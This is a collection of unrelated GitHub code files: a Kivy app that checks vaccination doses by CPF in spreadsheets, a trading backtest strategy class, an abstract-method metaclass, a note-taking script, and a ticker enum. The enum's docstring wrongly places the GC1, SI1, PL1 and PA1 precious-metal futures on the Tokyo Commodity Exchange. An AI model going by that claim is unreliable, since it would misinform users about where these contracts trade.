\"\"\n\n MDBoxLayout:\n spacing: dp(0)\n padding: dp(60)\n orientation: 'vertical'\n\n Image:\n size_hint_y: None\n id: bg_image\n source: \"fpsicon.png\"\n pos_hint: {'center_x': .5, 'center_y': .5}\n width: 100\n allow_stretch: True\n \n MDLabel:\n 
text: \"Lista de Vacinados\"\n halign:\"center\"\n font_style:\"H6\"\n\n MDLabel:\n text: \"Insira as informações abaixo para realizar uma consulta\"\n halign:\"center\" \n\n MDTextField:\n id:campoCpf\n mode: \"rectangle\" \n width: \"2dp\"\n text_color_normal:app.theme_cls.primary_color\n hint_text_color_normal:app.theme_cls.accent_color\n current_hint_text_color:[0.23529411764705882, 0.2549019607843137, 0.25882352941176473, 1.0] #mudou borda e letra \n text_color:app.theme_cls.accent_color #mudou cor do texto selecionado pra azul\n hint_text: \"CPF:\" \n helper_text: \"\"\n helper_text_mode: \"on_focus\"\n on_focus: app.campo_Cpf_Selecionado()\n on_text_validate: app.campo_Cpf_Selecionado()\n\n MDLabel:\n id:textoNome\n theme_text_color: \"Custom\"\n text: \"Nome:\"\n font_style:\"Subtitle2\"\n text_color:\"#09101D\"\n \n MDTextField:\n id: campoNome\n active_line:False\n icon_right: \"card-account-details-outline\"\n mode: \"rectangle\"\n font_size:'15sp'\n #icon_right: \"card-account-details-outline\" \n disabled:True \n helper_text: \"você pode digitar se preferir\"\n helper_text_mode: \"on_focus\"\n text_color_normal:app.theme_cls.primary_color\n hint_text_color_normal:app.theme_cls.accent_color\n current_hint_text_color:[0.23529411764705882, 0.2549019607843137, 0.25882352941176473, 1.0] #mudou borda e letra \n text_color:app.theme_cls.accent_color #mudou cor do texto selecionado pra azul\n on_focus: app.campo_nome_Selecionado()\n \n MDLabel:\n id:textoNome\n theme_text_color: \"Custom\"\n text: \"Doses Tomadas:\"\n font_style:\"Subtitle2\"\n text_color:\"#09101D\"\n \n MDTextField:\n id: campoVacinas \n active_line:False\n icon_right: \"needle\"\n mode: \"rectangle\"\n font_size:'15sp'\n #icon_right: \"database-search\" \n disabled:True \n helper_text: \"você pode digitar se preferir\"\n helper_text_mode: \"on_focus\"\n \n text_color_normal:app.theme_cls.primary_color\n hint_text_color_normal:app.theme_cls.accent_color\n current_hint_text_color:[0.23529411764705882, 0.2549019607843137, 0.25882352941176473, 1.0] #mudou borda e letra \n text_color:app.theme_cls.accent_color #mudou cor do texto selecionado pra azul\n on_focus: app.campo_nome_Selecionado()\n \n MDLabel:\n id:textoAjudante\n text: \"Its Search Time!!\"\n font_style:\"Subtitle2\"\n theme_text_color: \"Custom\"\n text_color:\"#B95000\"\n \n RecycleView:\n id: rv\n key_viewclass: 'viewclass'\n key_size: 'height'\n RecycleBoxLayout:\n padding: dp(10)\n default_size: None, dp(48)\n default_size_hint: 1, None\n size_hint_y: None\n height: self.minimum_height\n orientation: 'vertical' \n\n MDFloatingActionButton:\n icon: \"database-search\"\n on_release: app.checarDados(campoCpf.text)\n md_bg_color: app.theme_cls.primary_color\n pos_hint: {'center_x': .5, 'center_y': .5}\n\n'''\n)\n\n#classe do turno abaixo:\nclass IconListItem(OneLineIconListItem):\n icon = StringProperty()\n\nclass Contentx(BoxLayout):\n pass\n\n\n#classe do dialog\nclass Item(OneLineAvatarListItem):\n icon = StringProperty()\n divider = None\n source = StringProperty()\n\nclass CustomSnackbar(Snackbar):\n text = StringProperty(None)\n icon = StringProperty(None)\n font_size = NumericProperty(\"15sp\")\n\n\nclass CustomDialog(MDDialog):\n title = StringProperty()\n icon = StringProperty()\n\nclass CapitalInput(MDTextField):\n def insert_text(self, substring, from_undo=False):\n s = substring.upper()\n return super(CapitalInput, self).insert_text(s, from_undo=from_undo)\n\nclass CustomOneLineIconListItem(OneLineIconListItem):\n icon = StringProperty()\n \n# 
Declare both screens\nclass MenuScreen(Screen):\n pass\n\nclass SettingsScreen(Screen):\n pass\nclass PreviousMDIcons(Screen):\n pass\n \n\n\nclass MainApp(MDApp):\n dialog = None\n dialog2=None\n dialog3=None\n namez=StringProperty(\"mat\")\n first_namez=StringProperty(\"mat\")\n dialogCpf=StringProperty(\"\")\n dialogTurno=StringProperty(\"\")\n dialogVacinas=StringProperty(\"\")\n dialogUltimaVacina=StringProperty(\"\")\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.screen = PreviousMDIcons() \n\n#\n#\n#-----------------checadores de dados------------------\n#\n#\n\n def campo_Cpf_Selecionado(self):\n if self.screen.ids.campoCpf.text==\"\":\n print(self.screen.ids.campoCpf.line_color_normal)\n print(self.screen.ids.campoCpf.text,\"hmm\")\n \n else:\n print(self.screen.ids.campoCpf.current_hint_text_color)\n print(self.screen.ids.campoCpf.text,\"hmm\")\n \n self.checarDados2(self.screen.ids.campoCpf.text) \n\n def campo_nome_Selecionado(self):\n self.screen.ids.campoVacinas.icon_right=\"chevron-up\"\n if self.screen.ids.campoVacinas.text==\"\":\n print(self.screen.ids.campoVacinas.current_hint_text_color)\n else: \n print(\"po\")\n\n def checar_cpf(self):\n if not self.screen.ids.campoCpf.text:\n if self.logado==True:\n self.screen.ids.textoAjudante.text=\"Você precisa preencher o cpf\"\n else:\n self.screen.ids.textoAjudante.text=\"Você precisa Logar em uma conta para continuar\"\n \n self.screen.ids.textoAjudante.text_color = \"#B95000\" \n self.screen.ids.campoCpf.line_color_normal=\"#B95000\"\n self.screen.ids.campoCpf.hint_text_color_normal=\"#09101D\"\n self.screen.ids.campoCpf.line_color_focus=\"#18a0fb\"\n self.screen.ids.campoCpf.hint_text_color_focus=\"#18a0fb\"\n\n else:\n if self.logado==True:\n self.screen.ids.textoAjudante.text=\"cpf foi corretamente selecionada\"\n else:\n self.screen.ids.textoAjudante.text=\"cpf foi corretamente selecionada\"\n self.screen.ids.textoAjudante.text_color = \"#287D3C\"\n self.screen.ids.campoCpf.line_color_focus=\"#18a0fb\"\n self.screen.ids.campoCpf.line_color_normal=\"#287D3C\"\n self.screen.ids.campoCpf.hint_text_color_normal=\"#09101D\"\n self.screen.ids.campoCpf.hint_text_color_focus=\"#18a0fb\" \n\n def checarDados(self,cpf):\n self.dialogCpf=self.screen.ids.campoCpf.text\n self.dialogVacinas=self.screen.ids.campoVacinas.text\n self.dialogUltimaVacina=\"Rota \"+str(self.rota)\n self.checar_cpf()\n if self.logado==True:\n if self.screen.ids.campoCpf.text==\"\":\n self.matriculafinder=\"Preencha os campos obrigatórios para poder salvar! 
3 vazios\"\n elif self.screen.ids.campoCpf.text in self.block:\n self.matriculafinder=\"este cpf já foi utilizada em um agendamento, peça a sua alteração na sala!\"\n self.screen.ids.textoAjudante.text=\"este cpf já foi registrada no sistema!\"\n self.screen.ids.textoAjudante.text_color=\"#DA1414\"\n self.screen.ids.campoCpf.line_color_normal=\"#DA1414\"\n else:\n if self.logado==True:\n if self.cola1.__contains__(self.screen.ids.campoCpf.text):\n self.wsid=1\n\n self.domat(self.screen.ids.campoCpf.text)\n\n self.show_confirmation_dialog()\n self.screen.ids.textoAjudante.text_color = \"#287D3C\"\n if self.screen.ids.campoVacinas.text==\"4\" or self.screen.ids.campoVacinas.text==\"3\":\n self.screen.ids.textoAjudante.text=\"Um Resultado foi Encontrado, o cpf possui a quantidade de vacinas indicada para passar pela catraca!\"\n elif self.screen.ids.campoVacinas.text==\"2\" or self.screen.ids.campoVacinas.text==\"1\": \n self.screen.ids.textoAjudante.text_color = \"#B95000\" \n self.screen.ids.textoAjudante.text=\"Um Resultado foi Encontrado, o cpf não possui quantidade de vacinas indicada para passar pela catraca!\" \n elif self.cola2.__contains__(self.screen.ids.campoCpf.text):\n self.wsid=2\n\n self.domat(self.screen.ids.campoCpf.text)\n\n self.show_confirmation_dialog()\n self.screen.ids.textoAjudante.text_color = \"#287D3C\"\n if self.screen.ids.campoVacinas.text==\"4\" or self.screen.ids.campoVacinas.text==\"3\":\n self.screen.ids.textoAjudante.text=\"Um Resultado foi Encontrado, o cpf possui a quantidade de vacinas indicada para passar pela catraca!\"\n elif self.screen.ids.campoVacinas.text==\"2\" or self.screen.ids.campoVacinas.text==\"1\": \n self.screen.ids.textoAjudante.text_color = \"#B95000\" \n self.screen.ids.textoAjudante.text=\"Um Resultado foi Encontrado, o cpf não possui quantidade de vacinas indicada para passar pela catraca!\" \n else:\n self.matriculafinder=\"o cpf digitada não existe no sistema!\"\n self.screen.ids.textoAjudante.text=\"Nenhum Resultado foi encontrado!\"\n self.screen.ids.textoAjudante.text_color =\"#DA1414\" \n self.screen.ids.campoCpf.line_color_normal=\"#DA1414\"\n print(\"colab enchendo e number\")\n print(self.matriculafinder)\n else:\n self.screen.ids.textoAjudante.text_color=\"#DA1414\"\n self.screen.ids.textoAjudante.text=\"Você precisa Logar em uma conta para continuar\" \n else:\n self.screen.ids.textoAjudante.text_color=\"#DA1414\"\n self.screen.ids.textoAjudante.text=\"Você precisa Logar em uma conta para continuar\" \n def checarDados2(self,cpf):\n self.dialogCpf=self.screen.ids.campoCpf.text\n self.dialogVacinas=self.screen.ids.campoVacinas.text\n self.dialogUltimaVacina=\"Rota \"+str(self.rota)\n self.checar_cpf()\n \n if self.screen.ids.campoCpf.text==\"\":\n self.matriculafinder=\"Preencha os campos obrigatórios para poder salvar! 
3 vazios\"\n elif self.screen.ids.campoCpf.text in self.block:\n self.matriculafinder=\"este cpf já foi utilizada em um agendamento, peça a sua alteração na sala!\"\n self.screen.ids.textoAjudante.text=\"este cpf já foi registrada no sistema!\"\n self.screen.ids.textoAjudante.text_color=\"#DA1414\"\n self.screen.ids.campoCpf.line_color_normal=\"#DA1414\"\n else:\n\n if self.cola1.__contains__(self.screen.ids.campoCpf.text):\n self.wsid=1\n\n self.domat(self.screen.ids.campoCpf.text)\n \n\n self.screen.ids.textoAjudante.text_color = \"#287D3C\"\n if self.screen.ids.campoVacinas.text==\"4\" or self.screen.ids.campoVacinas.text==\"3\":\n self.screen.ids.textoAjudante.text=\"Um Resultado foi Encontrado, o cpf possui a quantidade de vacinas indicada para passar pela catraca!\"\n elif self.screen.ids.campoVacinas.text==\"2\" or self.screen.ids.campoVacinas.text==\"1\": \n self.screen.ids.textoAjudante.text_color = \"#B95000\" \n self.screen.ids.textoAjudante.text=\"Um Resultado foi Encontrado, o cpf não possui quantidade de vacinas indicada para passar pela catraca!\"\n elif self.cola2.__contains__(self.screen.ids.campoCpf.text):\n self.wsid=2\n\n self.domat(self.screen.ids.campoCpf.text)\n self.screen.ids.textoAjudante.text_color = \"#287D3C\"\n if self.screen.ids.campoVacinas.text==\"4\" or self.screen.ids.campoVacinas.text==\"3\":\n self.screen.ids.textoAjudante.text=\"Um Resultado foi Encontrado, o cpf possui a quantidade de vacinas indicada para passar pela catraca!\"\n elif self.screen.ids.campoVacinas.text==\"2\" or self.screen.ids.campoVacinas.text==\"1\": \n self.screen.ids.textoAjudante.text_color = \"#B95000\" \n self.screen.ids.textoAjudante.text=\"Um Resultado foi Encontrado, o cpf não possui quantidade de vacinas indicada para passar pela catraca!\" \n \n else:\n self.matriculafinder=\"o cpf digitada não existe no sistema!\"\n\n self.screen.ids.textoAjudante.text=\"Nenhum Estudante encontrado!\" \n self.screen.ids.textoAjudante.text_color =\"#DA1414\" \n self.screen.ids.campoCpf.line_color_normal=\"#DA1414\"\n self.screen.ids.campoVacinas.text=\"\"\n print(\"colab 1 :\")\n print(self.matriculafinder)\n#\n#\n#-----------------Salvar dados ------------------------\n#\n#\n def domat(self,cpf):\n if self.wsid==1:\n ws=wb.active\n else:\n ws=wd.active\n \n self.matriculafinder=\"Nenhuma cpf encontrada, verifique os dados e tente novamente!\"\n encouter=False\n print(\"valour de encouter é: \", str(encouter))\n \n log(\"debug: Lista de bloqueados - \"+str(self.block))\n\n for i in range(1, ws.max_row + 1):\n\n if str(cpf) == str(ws.cell(i,1).value):\n encouter=True\n if encouter == True:\n log(\"debug: uma matricula foi encontrada e uma caixa de dialogo foi acionada!\")\n log(\"debug: cpf encontrada e o valour de encouter é: \"+ str(encouter))\n rox=(ws.cell(i,1).value)\n self.namez=str(ws.cell(i,2).value)\n self.dialogTurno=str(ws.cell(i,5).value)\n self.dialogVacinas=str(ws.cell(i,7).value)\n self.dialogUltimaVacina=str(ws.cell(i,3).value)\n log(\"debug: Nome da aluna encontrada - \"+str(self.namez))\n self.screen.ids.campoNome.text=ws.cell(i,2).value\n self.screen.ids.campoVacinas.text=str(ws.cell(i,7).value)\n\n def doThis(self,cpf):\n #request_permissions([Permission.WRITE_EXTERNAL_STORAGE, Permission.READ_EXTERNAL_STORAGE])\n self.matriculafinder=\"Nenhuma cpf encontrada, verifique os dados e tente novamente!\"\n encouter=False\n log(\"debug: o valor de encouter é: \"+ str(encouter))\n\n for i in range(1, ws.max_row + 1):\n\n if str(cpf) == str(ws.cell(i,1).value):\n 
encouter=True\n log(\"debug: cpf encontrada e o valor de encouter é: \"+ str(encouter))\n now = datetime.now()\n dt=now.strftime(\"%d/%m/%Y %H:%M:%S\")\n if encouter == True:\n log(\"debug: cpf encontrada e o valour de encouter é: \"+ str(encouter))\n self.block.append(ws.cell(i,1).value)\n log(\"debug: Lista de bloqueados - \"+str(self.block))\n rox=(ws.cell(i,1).value,ws.cell(i,2).value,ws.cell(i,5).value,ws.cell(i,7).value,\"\",dt)\n \n name=str(ws.cell(i,1).value)\n self.first_name = name.rsplit(' ', 3)[0]\n self.matriculafinder= f'As informações foram salvas e uma copia do protocolo foi enviada para o estudante!'\n self.show(self.matriculafinder)\n \n rows = (\n (rox[0],rox[1], rox[2], rox[3],rox[4],rox[5],),\n\n )\n\n for row in rows:\n sheet.append(row)\n \n self.limpar()\n\n book.save(dirExcellDadosSalvos)\n \n elif str(cpf) != str(ws.cell(i,2).value):\n self.matriculafinder=\"Nenhuma cpf encontrada, verifique os dados e tente novamente!zzz\"\n if encouter == True:\n self.limpar()\n\n# \n#\n#-------------------------Snackbar--------------------------------\n#\n#\n def show(self,tt):\n self.snackbar = CustomSnackbar(\n text=tt,\n icon=\"information\",\n snackbar_x=\"10dp\",\n snackbar_y=\"10dp\",\n bg_color=\"#4caf50\",\n\n buttons=[MDFlatButton(text=\"[color=#FFFFFF]\"+\"OK\"+\"[/color]\", on_release= self.close,text_color=self.theme_cls.primary_color,),]\n \n )\n self.snackbar.size_hint_x = (\n Window.width - (self.snackbar.snackbar_x * 2)\n ) / Window.width\n self.snackbar.open()\n\n def limpar(self):\n self.screen.ids.campoVacinas.text=\"\"\n self.screen.ids.campoCpf.text=\"\"\n self.screen.ids.campoNome.text=\"\"\n self.screen.ids.textoAjudante.text=\"Insira um CPF para realizar uma pesquisa\"\n self.screen.ids.textoAjudante.text_color = \"#09101D\"\n self.screen.ids.textoNome.text_color = \"#09101D\"\n#\n# \n#----------------------dialogbox-----------------------------------------\n#\n#\n def close(self, *args):\n self.snackbar.dismiss(self)\n\n def show_confirmation_dialog(self):\n if not self.dialog:\n self.dialog = CustomDialog(\n title=\"Confira os detalhes da vacina\",\n icon=\"content-save\", \n type=\"custom\",\n content_cls=Contentx(),\n buttons=[\n MDRaisedButton(\n text=\"Editar informações\", md_bg_color=[.10, .10, .10, .10], text_color=[1,1,1,1],on_release= self.fecharDialogo\n ),\n MDRaisedButton(\n text=\"Confirmar e salvar\",md_bg_color=self.theme_cls.primary_color,text_color=[1,1,0,1], on_release= self.salvarDialogo\n ),\n ],\n )\n self.dialog.open()\n \n\n\n def salvarDialogo(self, *args):\n self.dialog.dismiss(force=True)\n log(\"debug: cpf que foi salva - \"+self.dialogCpf)\n cpf=self.dialogCpf\n self.dialogCpf=\"\"\n self.dialogTurno=\"\"\n self.dialogVacinas=\"\"\n self.dialogUltimaVacina=\"\"\n self.doThis(cpf)\n\n def fecharDialogo(self, *args):\n self.dialog.dismiss(force=True)\n##\n##-------------------Main configurations------------------------------------------------------\n##\n## \n def build(self):\n self.theme_cls.colors = colors\n self.theme_cls.primary_palette = \"Green\"\n self.theme_cls.accent_palette = \"Blue\"\n self.theme_cls.secondary_palette =\"Gray\"\n return self.screen\n \n def on_start(self):\n self.wsid=1\n self.screen.ids.campoCpf.line_color_focus=\"#18a0fb\"\n self.screen.ids.campoCpf.hint_text_color_focus=\"#18a0fb\"\n self.cola1=[]\n self.cola2=[]\n self.colab=[]\n self.logado=True\n self.block=[]\n #self.screen.set_list_md_icons()\n self.rota=\"\"\n self.first_name=\"\"\n self.cpfselect=False\n for i in range(1, ws.max_row + 
1):\n self.cola1.append(ws.cell(i,1).value)\n for i in range(1, wz.max_row + 1):\n self.cola2.append(wz.cell(i,1).value)\n \nMainApp().run()\n\n","repo_name":"lukadsant/ListadeVacinados","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":35815,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11810960900","text":"from datetime import timedelta, datetime, date\nimport pandas as pd\nimport numpy as np\nimport gzip\nimport shutil\nimport requests\nfrom collections import defaultdict\nimport time\nfrom Exchange import Exchange\nfrom Trade import Trade\nfrom Order import Order\nfrom heapq import heappush, heappop,heapify\nimport math\nimport os\n\n\nclass Strategy:\n ''' \n Class which interact wit the exchange to do the backtest \n and where you implement your own strategy \n '''\n def __init__(self, exchange, maker_fee = 2.5/1000, capital = 100, pct = 5/100):\n # self.current_time = start_time\n self.exchange = exchange\n self.prices = []\n #self.prices, self.prices = self.exchange.update_to_time(start_time)\n self.order_num = 0\n self.positions = 0.0\n self.realized_PNL = 0\n self.unrealized_PNL = 0\n self.MAKER_FEE = maker_fee\n self.capital = capital\n self.pct = pct\n # this is list because we allow dulplicates when record what is finished\n self.completed_order = []\n # these are sets because when place order each round we want unique orders\n self.orders_active = set([])\n self.orders_desired = set([])\n \n def add_order(self, direction, price, size ):\n ''' function that create a order object and add it to desired order list\n Inputs:\n direction: direction of order\n price: price of order\n size: size of order\n '''\n # ID auto generated as its position in order list\n ID = self.order_num\n self.order_num += 1\n \n order = Order(direction, size, price, ID)\n self.orders_desired.add(order)\n \n def place_orders(self):\n ''' function that place a set of orders to exchange'''\n ''' Uncomment print statements below to print out every order placed '''\n# print(' --------------------------\\n ')\n# print('Exchange time',self.exchange.current_time))\n# print('Current_order',[order.order_info() for order in self.orders_active],\n# '\\nDesired_order',[order.order_info() for order in self.orders_desired])\n\n # use set difference to find order to place and to cancel\n orders_to_place = self.orders_desired.difference(self.orders_active)\n orders_to_cancel = self.orders_active.difference(self.orders_desired)\n orders_to_keep = self.orders_active.intersection(self.orders_desired)\n \n# print('orders_to_place',[order.order_info() for order in orders_to_place],\n# '\\norders_to_cancel',[order.order_info() for order in orders_to_cancel],\n# '\\norders_to_keep',[order.order_info() for order in orders_to_keep])\n\n # reset activ order and desired order\n self.orders_active = self.orders_desired.copy()\n self.orders_desired = set([])\n \n # place and cancel orders\n self.exchange.place_orders(orders_to_place)\n self.exchange.cancel_orders(orders_to_cancel)\n \n# print('Orders_in_exchange',self.exchange.orders, self.exchange.queue)\n \n def update_prices(self,trade):\n ''' function that update exchange reported prices to record list\n Inputs:\n trade: a trade reported by exchange\n '''\n # update price to a list\n self.prices.append(trade.get_price())\n self.generate_signal()\n \n ### mean-reverting last tick, last tick up the next might go down...\n def generate_signal(self):\n ''' function that generate signal 
everytime a trade from exchange is updated\n it generate signal and place orders\n '''\n \n ''' \n IMPLEMENT YOUR STRATEGY HERE\n - Can add more recordings in fields, just need to add the code for update in \n update_prices(self,trade,coin)\n - Except MM strategy, also can use trained model to predict price\n\n SUBJECT TO CHANGE: \n place a sell order as last price * 1.01 and buy order as last price * 0.99,\n each time assume captial is constant and use pct*capital amount of money to place order\n '''\n # a simple MM strategy: look at MA 30 ticks vol and relative positions, \n # place orders when market shows no infomation about direction\n historical_prices = np.array(self.prices[-30:])\n \n if len(historical_prices) < 14:\n return\n\n # can make this a queue, can record in fields and update each update_prices\n MA_30ticks = np.mean(historical_prices)\n std_30ticks = np.std(historical_prices)\n \n max_div = (np.max(historical_prices) - np.min(historical_prices))/MA_30ticks\n \n lastest_price = historical_prices[-1]\n if std_30ticks != 0:\n z = abs(lastest_price - MA_30ticks)/std_30ticks # std of log return\n else:\n z = 0\n vol_30ticks = np.std(np.diff(np.log(historical_prices))) # very naive measure of current vol\n \n\n if all([z < 2,\n max_div < 0.02,\n vol_30ticks < 0.01]):\n min_tick_size = self.exchange.get_min_tick_size()\n \n for i in range(1,3):\n buy_price = lastest_price - min_tick_size*i\n sell_price = lastest_price + min_tick_size*i\n # place multiple order for market making\n self.add_order('Buy', buy_price, self.pct*self.capital/buy_price)\n self.add_order('Sell', sell_price, self.pct*self.capital/sell_price)\n \n # if there is no signal, it will still call place orders to cancel all orders \n self.place_orders()\n\n\n \n def mark_done(self,order,time):\n ''' function that mark a order as done, and record its time \n Inputs:\n order: order that is completed\n time: time when it is completed\n '''\n try:\n self.orders_active.remove(order)\n except:\n print(order.order_info())\n print([order.order_info() for order in self.orders_active])\n print([order.order_info() for order in self.orders_desired])\n raise Exception('order not exist in order order_list')\n # record completed order and update PNL\n dic = {'Buy':-1, 'Sell':1}\n sign = dic[order.get_type()]\n # add sign to maker fee, it should always be positive\n self.realized_PNL += sign*order.get_value()*(1+sign*self.MAKER_FEE)\n self.positions -= dic[order.get_type()]*order.get_size()\n self.completed_order.append((time,order))\n \n def calculate_unrealized_PNL(self):\n ''' \n function that compute all uncleared position with last trdae price in record\n we do not include maker fee here because it would be liquidated by the end of the backtest\n '''\n self.unrealized_PNL = self.positions*self.prices[-1]\n return self.unrealized_PNL\n \n def calculate_total_PNL(self):\n ''' function that compute all realized and unrealized PNL '''\n return self.calculate_unrealized_PNL() + self.get_realized_PNL()\n \n def get_realized_PNL(self):\n ''' function that compute the PNL realized through completed trades '''\n return self.realized_PNL\n \n def start_backtest(self):\n ''' function taht start backtest in self.exchange '''\n if self.exchange:\n self.exchange.add_subscriber(self)\n self.exchange.start_backtest()\n result_df = pd.DataFrame({'Realized_PNL':self.get_realized_PNL(),\n 'Total_PNL':self.calculate_total_PNL()},index = ['metrics'])\n try:\n display(result_df)\n except:\n print(result_df)\n else:\n raise Exception('Need to 
subscribe to exchange first')\n \n def get_positions(self):\n ''' functio that get the position in that strategy '''\n return self.positions\n ","repo_name":"klausxiang/Backtest_framework","sub_path":"Strategy.py","file_name":"Strategy.py","file_ext":"py","file_size_in_byte":8040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39974868163","text":"\"\"\"\n\n Trick to create abstract classes (raises error when instatiate)\n\n http://www.lychnis.net/index/programming/python-abstract-methods-3.lychnis\n\n Example: definition of an abstract class called \"MyAbstractClass\" with\n a virtual method called \"getSomething\"\n\n class MyAbstractClass(object):\n __metaclass__ = Metaclass\n getSomething = AbstractMethod('getSomething')\n\n \n\"\"\"\n\nclass AbstractMethod (object):\n def __init__(self, func):\n self._function = func\n \n def __get__(self, obj, type):\n return self.AbstractMethodHelper(self._function, type)\n\n class AbstractMethodHelper (object):\n def __init__(self, func, cls):\n self._function = func\n self._class = cls\n\n def __call__(self, *args, **kwargs):\n raise TypeError('Abstract method `' + self._class.__name__ \\\n + '.' + self._function + '\\' called')\n\nclass Metaclass (type):\n def __init__(cls, name, bases, *args, **kwargs):\n type.__init__(cls, name, bases, *args, **kwargs)\n cls.__new__ = staticmethod(cls.new)\n \n ancestors = list(cls.__mro__)\n ancestors.reverse() # Start with __builtin__.object\n abstractmethods = []\n for ancestor in ancestors:\n for clsname, clst in ancestor.__dict__.items():\n if isinstance(clst, AbstractMethod):\n abstractmethods.append(clsname)\n else:\n if clsname in abstractmethods:\n abstractmethods.remove(clsname)\n\n abstractmethods.sort()\n setattr(cls, '__abstractmethods__', abstractmethods)\n\n def new(self, cls):\n if len(cls.__abstractmethods__):\n raise NotImplementedError('Can\\'t instantiate class `' + \\\n cls.__name__ + '\\';\\n' + \\\n 'Abstract methods: ' + \\\n \", \".join(cls.__abstractmethods__))\n \n return object.__new__(self)\n","repo_name":"BackupTheBerlios/futil-svn","sub_path":"trunk/src/futil/utils/abstract.py","file_name":"abstract.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1011253750","text":"import json\nimport sys\n\ndef loadFile():\n try:\n f = open('workfile', 'r')\n except FileNotFoundError:\n f = open('workfile', 'w')\n f.close()\n f = open('workfile', 'r')\n return f\ndef loadList():\n try:\n ideas = json.load(f)\n except json.decoder.JSONDecodeError:\n ideas = []\n return ideas\n\ndef addIdea(ideaList):\n idea = input(\"What is your new idea: \")\n ideaList.append(idea)\ndef printIdeas(ideaList):\n print()\n print(\"Your ideabank:\")\n for i in range(len(ideaList)):\n print(str(i+1)+\". 
\"+ideaList[i])\ndef saveIdeas(ideaList, ideaFile):\n ideaFile.close()\n ideaFile = open('workfile', 'w')\n json.dump(ideaList, ideaFile)\n\ndef main():\n f = loadFile()\n ideas = loadList()\n\n if len(sys.argv) == 1:\n addIdea(ideas)\n printIdeas(ideas)\n saveIdeas(ideas, f)\n else:\n if sys.argv[1] == \"--list\":\n printIdeas(ideas)\n elif sys.argv[1] == \"--delete\":\n ideas.pop(int(sys.argv[2])-1)\n printIdeas(ideas)\n saveIdeas(ideas, f)\n\n f.close()\n\nmain()","repo_name":"mwagrodzki/codecool_dojos","sub_path":"ideabank.py","file_name":"ideabank.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"30031482087","text":"from enum import Enum\r\n\r\n\"\"\"\r\nFixed-Income US ETFs\r\nBIL: Short-term US Treasury bills ETF\r\nSHY: 1-3 year US Treasury bonds ETF\r\nIEI: 3-7 year US Treasury bonds ETF\r\nIEF: 7-10 year US Treasury bonds ETF\r\nTLT: 20+ YR US Treasury bonds ETF\r\nMBB: iShares MBS ETF\r\nLQD: iShares iBoxx Investment Grade Corporate Bond ETF\r\nHYG: iShares iBoxx High Yield Corporate Bond ETF\r\nJNK: SPDR Bloomberg Barclays High Yield Bond ETF\r\nPCY: Invesco Emerging Markets Sovereign Debt ETF\r\nBOND: PIMCO Total Return Bond ETF\r\n\r\nEQ EMERGING MARKETS ETFS\r\nFXI: iShares China Large-Cap ETF\r\nKWEB: KraneShares CSI China Internet ETF\r\nEWZ: iShares MSCI Brazil ETF\r\nEWW: iShares MSCI Mexico ETF\r\nEWS: iShares MSCI Singapore ETF\r\nEWY: iShares MSCI South Korea ETF\r\nEWT: iShares MSCI Taiwan ETF\r\nINDA: iShares MSCI India ETF\r\nEWH: iShares MSCI Hong Kong ETF\r\nEZA: iShares MSCI South Africa ETF\r\n\r\nEQ DEVELOPED COUNTRIES ETFS\r\nEWA: iShares MSCI Australia ETF\r\nEWC: iShares MSCI Canada ETF\r\nEWQ: iShares MSCI France ETF\r\nEWG: iShares MSCI Germany ETF\r\nEWI: iShares MSCI Italy ETF\r\nEWJ: iShares MSCI Japan ETF\r\nEWP: iShares MSCI Spain ETF\r\nEWU: iShares MSCI United Kingdom ETF\r\nEUFN: iShares MSCI Europe Financials ETF\r\nEWL: iShares MSCI Switzerland ETF\r\n\r\nEQ US SECTORS ETFS\r\nXLY: Consumer Discretionary ETF\r\nXLP: Consumer Staples ETF\r\nXLE: Energy ETF\r\nXLF: Financials ETF\r\nXLV: Healthcare ETF\r\nXLI: Industrial ETF\r\nXLB: Materials ETF\r\nXLK: Technology ETF\r\nXBI: Biotech ETF\r\nSMH: Semiconductor ETF\r\nXLC: Communication Services ETF\r\nXLU: Utilities ETF\r\nXME: Metals & Mining ETF\r\nGDX: Gold Miners ETF\r\nXOP: Oil & Gas Exploration & Production ETF\r\nXHB: Homebuilders ETF\r\nXLRE: Real Estate ETF\r\nXRT: Retail ETF\r\n\r\nEQ INDICES ETFS\r\nSPY: S&P 500 ETF\r\nQQQ: Nasdaq-100 ETF\r\nDIA: Dow Jones Industrial Average ETF\r\nIWM: Russell 2000 ETF\r\n\r\nFixed-Income Futures (100K$ face value traded on CBOT)\r\nZT1: 2-3 year Treasury note futures\r\nZF1: 4.5-5.5 year Treasury bond futures\r\nZN1: 9-10 year Treasury note futures\r\nZB1: 15-25 year Treasury bond futures\r\n\r\nPrecious Metals futures\r\nGC1: Gold futures contract traded on the Tokyo Commodity Exchange (Tocom).\r\nSI1: Silver futures contract traded on the Tocom.\r\nPL1: Platinum futures contract traded on the Tocom.\r\nPA1: Palladium futures contract traded on the Tocom.\r\n\r\nEnergy futures\r\nCL1: Crude oil futures contract traded on the New York Mercantile\r\nExchange (NYMEX).\r\nNG1: Natural gas futures contract traded on the NYMEX.\r\nHO1: Heating oil futures contract traded on the NYMEX.\r\nBZ1: Brent crude oil futures contract traded on the Intercontinental\r\nExchange (ICE).\r\nRB1: RBOB gasoline futures contract traded on the NYMEX.\r\n\r\nUS EQ IDX 
